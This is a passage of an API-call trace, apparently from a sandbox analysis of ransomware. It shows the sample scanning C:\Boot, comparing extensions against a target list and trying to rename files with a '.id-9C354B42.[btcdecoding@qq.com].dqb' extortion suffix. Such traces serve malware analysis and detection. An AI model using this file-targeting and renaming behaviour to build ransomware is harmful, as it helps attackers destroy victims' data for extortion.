(lpString1=".ppt", lpString2="LOG2") returned -1 [0032.826] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0032.826] lstrlenW (lpString=".zip") returned 4 [0032.826] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0032.826] lstrlenW (lpString=".rar") returned 4 [0032.826] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0032.826] lstrlenW (lpString=".bz2") returned 4 [0032.826] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0032.826] lstrlenW (lpString=".7z") returned 3 [0032.826] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0032.826] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0032.826] lstrlenW (lpString=".dbf") returned 4 [0032.826] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0032.826] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0032.826] lstrlenW (lpString=".1cd") returned 4 [0032.826] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0032.826] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0032.826] lstrlenW (lpString=".jpg") returned 4 [0032.826] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0032.826] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0032.827] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0032.827] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0032.827] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=89168) returned 1 [0032.827] CloseHandle (hObject=0x160) returned 1 [0032.827] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0032.827] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.827] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.827] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0032.827] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0032.827] lstrlenW (lpString=".doc") returned 4 [0032.827] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.827] lstrlenW (lpString=".docx") returned 5 [0032.827] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.827] lstrlenW (lpString=".pdf") returned 4 [0032.827] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.827] lstrlenW (lpString=".xls") returned 4 [0032.827] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.827] lstrlenW (lpString=".xlsx") returned 5 [0032.827] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.827] lstrlenW (lpString=".ppt") returned 4 [0032.827] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.828] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0032.828] lstrlenW (lpString=".zip") returned 4 [0032.828] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.828] lstrlenW (lpString=".rar") returned 4 [0032.828] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.828] lstrlenW (lpString=".bz2") returned 4 [0032.828] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.828] lstrlenW (lpString=".7z") returned 3 [0032.828] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.828] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0032.828] lstrlenW (lpString=".dbf") returned 4 [0032.828] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.828] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0032.828] lstrlenW (lpString=".1cd") returned 4 [0032.828] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.828] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0032.828] lstrlenW (lpString=".jpg") returned 4 [0032.828] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.828] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0032.828] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0032.828] lstrlenW (lpString=".doc") returned 4 [0032.828] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.828] lstrlenW (lpString=".docx") returned 5 [0032.828] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.828] lstrlenW (lpString=".pdf") returned 4 [0032.828] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.828] lstrlenW (lpString=".xls") returned 4 [0032.828] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.828] lstrlenW (lpString=".xlsx") returned 5 [0032.828] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.828] lstrlenW (lpString=".ppt") returned 4 [0032.828] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.828] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0032.828] lstrlenW (lpString=".zip") returned 4 [0032.828] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.829] lstrlenW (lpString=".rar") returned 4 [0032.829] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.829] lstrlenW (lpString=".bz2") returned 4 [0032.829] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.829] lstrlenW (lpString=".7z") returned 3 [0032.829] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.829] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0032.829] lstrlenW (lpString=".dbf") returned 4 [0032.829] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.829] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0032.829] lstrlenW (lpString=".1cd") returned 4 [0032.829] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.829] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0032.829] lstrlenW (lpString=".jpg") returned 4 [0032.829] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.829] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0032.829] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0032.829] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0032.829] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=87616) returned 1 [0032.829] CloseHandle (hObject=0x160) returned 1 [0032.829] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0032.829] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.830] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.830] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0032.830] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0032.830] lstrlenW (lpString=".doc") returned 4 [0032.830] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.830] lstrlenW (lpString=".docx") returned 5 [0032.830] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.830] lstrlenW (lpString=".pdf") returned 4 [0032.830] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.830] lstrlenW (lpString=".xls") returned 4 [0032.830] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.830] lstrlenW (lpString=".xlsx") returned 5 [0032.830] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.830] lstrlenW (lpString=".ppt") returned 4 [0032.830] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.830] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0032.830] lstrlenW (lpString=".zip") returned 4 [0032.830] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.831] lstrlenW (lpString=".rar") returned 4 [0032.831] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.831] lstrlenW (lpString=".bz2") returned 4 [0032.831] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.831] lstrlenW (lpString=".7z") returned 3 [0032.831] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.831] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0032.831] lstrlenW (lpString=".dbf") returned 4 [0032.831] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.831] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0032.831] lstrlenW (lpString=".1cd") returned 4 [0032.831] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.831] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0032.831] lstrlenW (lpString=".jpg") returned 4 [0032.831] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.831] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0032.831] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0032.831] lstrlenW (lpString=".doc") returned 4 [0032.831] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.831] lstrlenW (lpString=".docx") returned 5 [0032.831] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.831] lstrlenW (lpString=".pdf") returned 4 [0032.831] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.831] lstrlenW (lpString=".xls") returned 4 [0032.831] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.831] lstrlenW (lpString=".xlsx") returned 5 [0032.831] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.831] lstrlenW (lpString=".ppt") returned 4 [0032.831] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.831] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0032.831] lstrlenW (lpString=".zip") returned 4 [0032.831] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.831] lstrlenW (lpString=".rar") returned 4 [0032.831] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.831] lstrlenW (lpString=".bz2") returned 4 [0032.832] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.832] lstrlenW (lpString=".7z") returned 3 [0032.832] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.832] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0032.832] lstrlenW (lpString=".dbf") returned 4 [0032.832] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.832] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0032.832] lstrlenW (lpString=".1cd") returned 4 [0032.832] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.832] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0032.832] lstrlenW (lpString=".jpg") returned 4 [0032.832] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.832] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0032.832] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0032.832] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0032.832] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=91712) returned 1 [0032.832] CloseHandle (hObject=0x160) returned 1 [0032.832] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0032.832] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.833] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.833] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0032.833] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0032.833] lstrlenW (lpString=".doc") returned 4 [0032.833] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.833] lstrlenW (lpString=".docx") returned 5 [0032.833] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.833] lstrlenW (lpString=".pdf") returned 4 [0032.833] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.833] lstrlenW (lpString=".xls") returned 4 [0032.833] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.833] lstrlenW (lpString=".xlsx") returned 5 [0032.833] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.833] lstrlenW (lpString=".ppt") returned 4 [0032.833] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.833] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0032.833] lstrlenW (lpString=".zip") returned 4 [0032.833] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.833] lstrlenW (lpString=".rar") returned 4 [0032.833] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.833] lstrlenW (lpString=".bz2") returned 4 [0032.833] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.833] lstrlenW (lpString=".7z") returned 3 [0032.833] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.833] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0032.833] lstrlenW (lpString=".dbf") returned 4 [0032.833] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.833] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0032.833] lstrlenW (lpString=".1cd") returned 4 [0032.833] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.833] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0032.833] lstrlenW (lpString=".jpg") returned 4 [0032.833] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.834] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0032.834] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0032.834] lstrlenW (lpString=".doc") returned 4 [0032.834] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.834] lstrlenW (lpString=".docx") returned 5 [0032.834] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.834] lstrlenW (lpString=".pdf") returned 4 [0032.834] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.834] lstrlenW (lpString=".xls") returned 4 [0032.834] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.834] lstrlenW (lpString=".xlsx") returned 5 [0032.834] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.834] lstrlenW (lpString=".ppt") returned 4 [0032.834] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.834] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0032.834] lstrlenW (lpString=".zip") returned 4 [0032.834] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.834] lstrlenW (lpString=".rar") returned 4 [0032.834] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.834] lstrlenW (lpString=".bz2") returned 4 [0032.834] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.834] lstrlenW (lpString=".7z") returned 3 [0032.834] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.834] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0032.834] lstrlenW (lpString=".dbf") returned 4 [0032.834] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0032.834] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0032.834] lstrlenW (lpString=".1cd") returned 4 [0032.834] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0032.834] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0032.834] lstrlenW (lpString=".jpg") returned 4 [0032.834] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0032.835] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0032.835] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0032.835] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0032.835] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=94800) returned 1 [0032.835] CloseHandle (hObject=0x160) returned 1 [0032.835] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0032.835] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.835] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.835] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0032.835] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0032.835] lstrlenW (lpString=".doc") returned 4 [0032.835] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0032.835] lstrlenW (lpString=".docx") returned 5 [0032.835] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0032.835] lstrlenW (lpString=".pdf") returned 4 [0032.835] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0032.835] lstrlenW (lpString=".xls") returned 4 [0032.835] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0032.835] lstrlenW (lpString=".xlsx") returned 5 [0032.835] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0032.835] lstrlenW (lpString=".ppt") returned 4 [0032.835] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0032.835] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0032.836] lstrlenW (lpString=".zip") returned 4 [0032.836] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0032.836] lstrlenW (lpString=".rar") returned 4 [0032.836] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0032.836] lstrlenW (lpString=".bz2") returned 4 [0032.836] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0032.836] lstrlenW (lpString=".7z") returned 3 [0032.836] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0032.838] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=85056) returned 1 [0032.838] CloseHandle (hObject=0x160) returned 1 [0032.838] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui")) returned 0x20 [0032.838] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.838] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.838] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=43600) returned 1 [0032.838] CloseHandle (hObject=0x160) returned 1 [0032.838] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui")) returned 0x20 [0032.838] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.838] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.839] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=90192) returned 1 [0032.839] CloseHandle (hObject=0x160) returned 1 [0032.839] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui")) returned 0x20 [0032.839] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.839] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.839] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=89152) returned 1 [0032.839] CloseHandle (hObject=0x160) returned 1 [0032.839] GetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui")) returned 0x20 [0032.839] GetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.839] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.840] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=3694080) returned 1 [0032.840] CloseHandle (hObject=0x160) returned 1 [0032.840] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0x20 [0032.840] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.840] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0032.842] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=3876772) returned 1 [0032.842] CloseHandle (hObject=0x160) returned 1 [0032.842] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0x20 [0032.842] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.842] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0032.842] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=1984228) returned 1 [0032.842] CloseHandle (hObject=0x160) returned 1 [0032.842] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0032.843] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.843] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0032.843] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=2371360) returned 1 [0032.843] CloseHandle (hObject=0x160) returned 1 [0032.843] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0032.843] GetFileAttributesW 